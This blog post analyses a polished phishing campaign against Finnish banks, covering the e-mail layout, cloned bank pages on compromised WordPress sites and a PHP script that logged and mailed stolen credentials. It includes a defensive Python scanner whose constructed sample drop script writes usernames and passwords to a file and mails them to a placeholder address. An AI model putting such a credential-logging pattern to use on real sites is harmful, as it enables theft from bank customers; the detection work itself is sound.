As we all know, there are myriad phishing e-mails sent every moment. The banking industry has always been one of the major targets, and for a reason.
Finnish banks have also been scam targets many times. Since the Finnish language is quite hard, the quality of the translated content in these e-mails has been very poor… until a very recent attempt which clearly differs from the earlier ones.
Contents of an E-mail
I have to admit, as a native Finn, that this scam e-mail is very well written. There are some minor mistakes, but it's mostly like reading an official e-mail written by the bank's own authors.
It seems that every major Finnish bank was targeted. Scam e-mails were sent randomly, so recipients most likely got several e-mails purporting to come from different banks.
I was able to scan all these different e-mails, and it was obvious that time had been spent creating a dedicated e-mail for every bank. You can view the contents of an e-mail here.
The structure of an e-mail is as follows:
- contact information (unique per bank),
- a notification that the account is about to expire and needs to be renewed,
- a masked link to the phishing site,
- a list of benefits of being a customer (probably copied from the bank's website?),
- regards (unique per bank).
The phishing site itself is a realistic-looking (or actual) copy of the bank's own website. It's very hard to visually distinguish the phishing site from the real one. The skeleton is taken from the real bank's website and the form content is modified.
I was lucky enough to receive all the files of the infected website – both the user interface and the PHP script collecting and logging the form data. As a web developer, I noticed that this could have been done way better. But as I mentioned, the site looks and feels real, no matter how things are under the hood.
The Code Behind
I won't go through the user interface itself, since there's nothing that interesting about it. If you're interested in seeing screen captures, check this article (in Finnish).
What I was interested in was how it worked. I quickly found out that all the data was logged into a text file, which contained everything that had been posted. Sadly, I found that real and sensitive information had been posted by many users.
I reported these findings to the National Cyber Security Centre Finland and got a quick response: they had already found this logic, and there were about 40 infected sites collecting information. I don't know how many credentials were leaked in total, but every log file I went through contained 5–15 real credentials and a few fake ones.
You can view the actual PHP script here. As you can see, it's very simple and crude, but it does the job it was meant for – it logs the data and sends it via e-mail.
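A defender-side check suggested by the script described above, written as an added example and not the kit's own code: a heuristic scan of a web root for PHP files that read POSTed fields, append them to a file and call mail() in the same script. The indicator patterns and the two sample files are assumptions constructed for the demo.

```python
# Added example (not the phishing kit's own code): heuristic scan of a web
# root for PHP "drop scripts" of the kind described above, i.e. code that takes
# POSTed form fields, appends them to a text file and mails them out.
# The sample file contents below are constructed for the demo.
import os
import re
import tempfile

# Three indicators that together characterise the crude logger described above.
POST_RE = re.compile(r"\$_(POST|REQUEST)\b")
WRITE_RE = re.compile(r"\b(file_put_contents|fwrite|fputs)\s*\(")
MAIL_RE = re.compile(r"\bmail\s*\(")

def is_drop_script(source: str) -> bool:
    """True only when POST access, a file write and mail() all appear."""
    return all(p.search(source) for p in (POST_RE, WRITE_RE, MAIL_RE))

def scan_webroot(root: str) -> list:
    """Return relative paths of .php files under root matching the pattern."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    if is_drop_script(fh.read()):
                        hits.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(hits)

# Constructed samples: a crude logger like the one described, and a benign page.
SAMPLE_DROP = ('<?php $d = $_POST["user"] . ":" . $_POST["pass"] . "\\n";'
               ' file_put_contents("log.txt", $d, FILE_APPEND);'
               ' mail("drop@example.invalid", "new", $d); ?>')
SAMPLE_BENIGN = '<?php echo htmlspecialchars($_POST["q"] ?? ""); ?>'

def demo() -> list:
    """Build a throwaway web root holding both samples and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content", "uploads"))
        with open(os.path.join(root, "wp-content", "uploads", "verify.php"), "w") as fh:
            fh.write(SAMPLE_DROP)
        with open(os.path.join(root, "search.php"), "w") as fh:
            fh.write(SAMPLE_BENIGN)
        return scan_webroot(root)

if __name__ == "__main__":
    print(demo())  # ['wp-content/uploads/verify.php']
```

The three-indicator rule is deliberately narrow to keep false positives low on a real WordPress install; a hit is a file to read by hand, not a verdict.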
I noticed a few patterns when going through the infected websites:
- they are mostly WordPress sites,
- some of the infected sites are located in Romania.
There are no assumptions to be made from this, since security holes and malicious people are everywhere. However, this was well planned: several WordPress sites were compromised instead of free .tk websites being spun up.
NCSC Finland has done an excellent job informing the administrators of the compromised websites so that they remove the phishing page and/or block the requests. Additionally, all the banks and the Finnish media have taken action to inform the public about this threat, which probably minimises the damage.
Certainly these phishing attempts are getting more professional all the time. As for me, I've personally spent time reporting mostly reflected XSS flaws (also to banks), and I see it as a very big threat when well-formed e-mails and even the smallest security flaws on banks' websites are used together. This also applies to e-commerce and other websites dealing with serious money.